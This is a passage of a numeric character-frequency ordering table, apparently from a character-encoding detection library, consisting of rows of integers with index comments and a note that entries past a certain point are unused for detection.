3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376 #last 512
#Everything below is of no interest for detection purpose
2522,1613,4812,5799,3345,3945,2523,5800,4162,5801,1637,4163,2471,4813,3946,5802, # 5392
2500,3034,3800,5803,5804,2195,4814,5805,2163,5806,5807,5808,5809,5810,5811,5812, # 5408
5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828, # 5424
5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844, # 5440
5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860, # 5456
5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876, # 5472
5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892, # 5488
5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908, # 5504
5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924, # 5520
5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940, # 5536
5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956, # 5552
5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972, # 5568
5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988, # 5584
5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004, # 5600
6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020, # 5616
6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032,6033,6034,6035,6036, # 5632
6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052, # 5648
6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068, # 5664
6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084, # 5680
6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100, # 5696
6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116, # 5712
6117,6118,6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,6132, # 5728
6133,6134,6135,6136,6137,6138,6139,6140,6141,6142,6143,6144,6145,6146,6147,6148, # 5744
6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,6164, # 5760
6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,6180, # 5776
6181,6182,6183,6184,6185,6186,6187,6188,6189,6190,6191,6192,6193,6194,6195,6196, # 5792
6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,6211,6212, # 5808
6213,6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,3670,6224,6225,6226,6227, # 5824
6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,6242,6243, # 5840
6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,6254,6255,6256,6257,6258,6259, # 5856
6260,6261,6262,6263,6264,6265,6266,6267,6268,6269,6270,6271,6272,6273,6274,6275, # 5872
6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,4815,6286,6287,6288,6289,6290, # 5888
6291,6292,4816,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,6303,6304,6305, # 5904
6306,6307,6308,6309,6310,6311,4817,4818,6312,6313,6314,6315,6316,6317,6318,4819, # 5920
6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,6334, # 5936
6335,6336,6337,4820,6338,6339,6340,6341,6342,6343,6344,6345,6346,6347,6348,6349, # 5952
6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,6364,6365, # 5968
6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,6380,6381, # 5984
6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,6396,6397, # 6000
6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,3441,6411,6412, # 6016
6413,6414,6415,6416,6417,6418,6419,6420,6421,6422,6423,6424,6425,4440,6426,6427, # 6032
6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,6441,6442,6443, # 6048
6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,4821,6455,6456,6457,6458, # 6064
6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,6473,6474, # 6080
6475,6476,6477,3947,3948,6478,6479,6480,6481,3272,4441,6482,6483,6484,6485,4442, # 6096
6486,6487,6488,6489,6490,6491,6492,6493,6494,6495,6496,4822,6497,6498,6499,6500, # 6112
6501,6502,6503,6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516, # 6128
6517,6518,6519,6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532, # 6144
6533,6534,6535,6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548, # 6160
6549,6550,6551,6552,6553,6554,6555,6556,2784,6557,4823,6558,6559,6560,6561,6562, # 6176
6563,6564,6565,6566,6567,6568,6569,3949,6570,6571,6572,4824,6573,6574,6575,6576, # 6192
6577,6578,6579,6580,6581,6582,6583,4825,6584,6585,6586,3950,2785,6587,6588,6589, # 6208
6590,6591,6592,6593,6594,6595,6596,6597,6598,6599,6600,6601,6602,6603,6604,6605, # 6224
6606,6607,6608,6609,6610,6611,6612,4826,6613,6614,6615,4827,6616,6617,6618,6619, # 6240
6620,6621,6622,6623,6624,6625,4164,6626,6627,6628,6629,6630,6631,6632,6633,6634, # 6256
3547,6635,4828,6636,6637,6638,6639,6640,6641,6642,3951,2984,6643,6644,6645,6646, # 6272
6647,6648,6649,4165,6650,4829,6651,6652,4830,6653,6654,6655,6656,6657,6658,6659, # 6288
6660,6661,6662,4831,6663,6664,6665,6666,6667,6668,6669,6670,6671,4166,6672,4832, # 6304
3952,6673,6674,6675,6676,4833,6677,6678,6679,4167,6680,6681,6682,3198,6683,6684, # 6320
6685,6686,6687,6688,6689,6690,6691,6692,6693,6694,6695,6696,6697,4834,6698,6699, # 6336
6700,6701,6702,6703,6704,6705,6706,6707,6708,6709,6710,6711,6712,6713,6714,6715, # 6352
6716,6717,6718,6719,6720,6721,6722,6723,6724,6725,6726,6727,6728,6729,6730,6731, # 6368
6732,6733,6734,4443,6735,6736,6737,6738,6739,6740,6741,6742,6743,6744,6745,4444, # 6384
6746,6747,6748,6749,6750,6751,6752,6753,6754,6755,6756,6757,6758,6759,6760,6761, # 6400
6762,6763,6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777, # 6416
6778,6779,6780,6781,4168,6782,6783,3442,6784,6785,6786,6787,6788,6789,6790,6791, # 6432
4169,6792,6793,6794,6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806, # 6448
6807,6808,6809,6810,6811,4835,6812,6813,6814,4445,6815,6816,4446,6817,6818,6819, # 6464
6820,6821,6822,6823,6824,6825,6826,6827,6828,6829,6830,6831,6832,6833,6834,6835, # 6480
3548,6836,6837,6838,6839,6840,6841,6842,6843,6844,6845,6846,4836,6847,6848,6849, # 6496
6850,6851,6852,6853,6854,3953,6855,6856,6857,6858,6859,6860,6861,6862,6863,6864, # 6512
6865,6866,6867,6868,6869,6870,6871,6872,6873,6874,6875,6876,6877,3199,6878,6879, # 6528
6880,6881,6882,4447,6883,6884,6885,6886,6887,6888,6889,6890,6891,6892,6893,6894, # 6544
6895,6896,6897,6898,6899,6900,6901,6902,6903,6904,4170,6905,6906,6907,6908,6909, # 6560
6910,6911,6912,6913,6914,6915,6916,6917,6918,6919,6920,6921,6922,6923,6924,6925, # 6576
6926,6927,4837,6928,6929,6930,6931,6932,6933,6934,6935,6936,3346,6937,6938,4838, # 6592
6939,6940,6941,4448,6942,6943,6944,6945,6946,4449,6947,6948,6949,6950,6951,6952, # 6608
6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,6967,6968, # 6624
6969,6970,6971,6972,6973,6974,6975,6976,6977,6978,6979,6980,6981,6982,6983,6984, # 6640
6985,6986,6987,6988,6989,6990,6991,6992,6993,6994,3671,6995,6996,6997,6998,4839, # 6656
6999,7000,7001,7002,3549,7003,7004,7005,7006,7007,7008,7009,7010,7011,7012,7013, # 6672
7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,7028,7029, # 6688
7030,4840,7031,7032,7033,7034,7035,7036,7037,7038,4841,7039,7040,7041,7042,7043, # 6704
7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,7059, # 6720
7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,2985,7071,7072,7073,7074, # 6736
7075,7076,7077,7078,7079,7080,4842,7081,7082,7083,7084,7085,7086,7087,7088,7089, # 6752
7090,7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105, # 6768
7106,7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,4450,7119,7120, # 6784
7121,7122,7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136, # 6800
7137,7138,7139,7140,7141,7142,7143,4843,7144,7145,7146,7147,7148,7149,7150,7151, # 6816
7152,7153,7154,7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167, # 6832
7168,7169,7170,7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183, # 6848
7184,7185,7186,7187,7188,4171,4172,7189,7190,7191,7192,7193,7194,7195,7196,7197, # 6864
7198,7199,7200,7201,7202,7203,7204,7205,7206,7207,7208,7209,7210,7211,7212,7213, # 6880
7214,7215,7216,7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229, # 6896
7230,7231,7232,7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245, # 6912
7246,7247,7248,7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261, # 6928
7262,7263,7264,7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277, # 6944
7278,7279,7280,7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293, # 6960
7294,7295,7296,4844,7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308, # 6976
7309,7310,7311,7312,7313,7314,7315,7316,4451,7317,7318,7319,7320,7321,7322,7323, # 6992
7324,7325,7326,7327,7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339, # 7008
7340,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,4173,7354, # 7024
7355,4845,7356,7357,7358,7359,7360,7361,7362,7363,7364,7365,7366,7367,7368,7369, # 7040
7370,7371,7372,7373,7374,7375,7376,7377,7378,7379,7380,7381,7382,7383,7384,7385, # 7056
7386,7387,7388,4846,7389,7390,7391,7392,7393,7394,7395,7396,7397,7398,7399,7400, # 7072
7401,7402,7403,7404,7405,3672,7406,7407,7408,7409,7410,7411,7412,7413,7414,7415, # 7088
7416,7417,7418,7419,7420,7421,7422,7423,7424,7425,7426,7427,7428,7429,7430,7431, # 7104
7432,7433,7434,7435,7436,7437,7438,7439,7440,7441,7442,7443,7444,7445,7446,7447, # 7120
7448,7449,7450,7451,7452,7453,4452,7454,3200,7455,7456,7457,7458,7459,7460,7461, # 7136
7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,7472,7473,7474,4847,7475,7476, # 7152
7477,3133,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491, # 7168
7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,3347,7503,7504,7505,7506, # 7184
7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,7520,7521,4848, # 7200
7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,7536,7537, # 7216
7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,3801,4849,7550,7551, # 7232
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, # 7248
7568,7569,3035,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582, # 7264
7583,7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598, # 7280
7599,7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614, # 7296
7615,7616,4850,7617,7618,3802,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628, # 7312
7629,7630,7631,7632,4851,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643, # 7328
7644,7645,7646,7647,7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659, # 7344
7660,7661,7662,7663,7664,7665,7666,7667,7668,7669,7670,4453,7671,7672,7673,7674, # 7360
7675,7676,7677,7678,7679,7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690, # 7376
7691,7692,7693,7694,7695,7696,7697,3443,7698,7699,7700,7701,7702,4454,7703,7704, # 7392
7705,7706,7707,7708,7709,7710,7711,7712,7713,2472,7714,7715,7716,7717,7718,7719, # 7408
7720,7721,7722,7723,7724,7725,7726,7727,7728,7729,7730,7731,3954,7732,7733,7734, # 7424
7735,7736,7737,7738,7739,7740,7741,7742,7743,7744,7745,7746,7747,7748,7749,7750, # 7440
3134,7751,7752,4852,7753,7754,7755,4853,7756,7757,7758,7759,7760,4174,7761,7762, # 7456
7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,7777,7778, # 7472
7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,7792,7793,7794, # 7488
7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,4854,7806,7807,7808,7809, # 7504
7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824,7825, # 7520
4855,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7536
7841,7842,7843,7844,7845,7846,7847,3955,7848,7849,7850,7851,7852,7853,7854,7855, # 7552
7856,7857,7858,7859,7860,3444,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870, # 7568
7871,7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886, # 7584
7887,7888,7889,7890,7891,4175,7892,7893,7894,7895,7896,4856,4857,7897,7898,7899, # 7600
7900,2598,7901,7902,7903,7904,7905,7906,7907,7908,4455,7909,7910,7911,7912,7913, # 7616
7914,3201,7915,7916,7917,7918,7919,7920,7921,4858,7922,7923,7924,7925,7926,7927, # 7632
7928,7929,7930,7931,7932,7933,7934,7935,7936,7937,7938,7939,7940,7941,7942,7943, # 7648
7944,7945,7946,7947,7948,7949,7950,7951,7952,7953,7954,7955,7956,7957,7958,7959, # 7664
7960,7961,7962,7963,7964,7965,7966,7967,7968,7969,7970,7971,7972,7973,7974,7975, # 7680
7976,7977,7978,7979,7980,7981,4859,7982,7983,7984,7985,7986,7987,7988,7989,7990, # 7696
7991,7992,7993,7994,7995,7996,4860,7997,7998,7999,8000,8001,8002,8003,8004,8005, # 7712
8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,4176,8017,8018,8019,8020, # 7728
8021,8022,8023,4861,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035, # 7744
8036,4862,4456,8037,8038,8039,8040,4863,8041,8042,8043,8044,8045,8046,8047,8048, # 7760
8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064, # 7776
8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080, # 7792
8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096, # 7808
8097,8098,8099,4864,4177,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110, # 7824
8111,8112,8113,8114,8115,8116,8117,8118,8119,8120,4178,8121,8122,8123,8124,8125, # 7840
8126,8127,8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141, # 7856
8142,8143,8144,8145,4865,4866,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155, # 7872
8156,8157,8158,8159,8160,8161,8162,8163,8164,8165,4179,8166,8167,8168,8169,8170, # 7888
8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181,4457,8182,8183,8184,8185, # 7904
8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201, # 7920
8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213,8214,8215,8216,8217, # 7936
8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229,8230,8231,8232,8233, # 7952
8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245,8246,8247,8248,8249, # 7968
8250,8251,8252,8253,8254,8255,8256,3445,8257,8258,8259,8260,8261,8262,4458,8263, # 7984
8264,8265,8266,8267,8268,8269,8270,8271,8272,4459,8273,8274,8275,8276,3550,8277, # 8000
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,4460,8290,8291,8292, # 8016
8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,4867, # 8032
8308,8309,8310,8311,8312,3551,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322, # 8048
8323,8324,8325,8326,4868,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337, # 8064
8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353, # 8080
8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,4869,4461,8364,8365,8366,8367, # 8096
